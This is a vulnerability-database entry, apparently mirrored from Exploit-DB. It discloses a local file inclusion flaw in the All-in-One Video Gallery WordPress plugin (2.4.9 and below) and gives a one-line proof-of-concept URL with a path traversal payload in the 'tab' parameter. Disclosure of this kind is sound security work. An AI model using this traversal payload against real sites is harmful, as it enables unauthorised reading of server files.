Lucene search

K

WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)

🗓️ 03 Dec 2021 00:00:00Reported by Mohamed Magdy AbumusilmType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 370 Views

WordPress Plugin All-in-One Video Gallery plugin 2.4.9 Local File Inclusion exploit

Show more
Code
# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI) 
# Exploit Author: Mohamed Magdy Abumusilm Aka m19o 
# Software: All-in-One Video Gallery plugin 
# Version: <= 2.4.9
# Tested on: Windows,linux 

Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc

Decription : Authenticated user can exploit LFI vulnerability in tab parameter.

Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png

You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Dec 2021 00:00Current
7.4High risk
Vulners AI Score7.4
370
.json
Report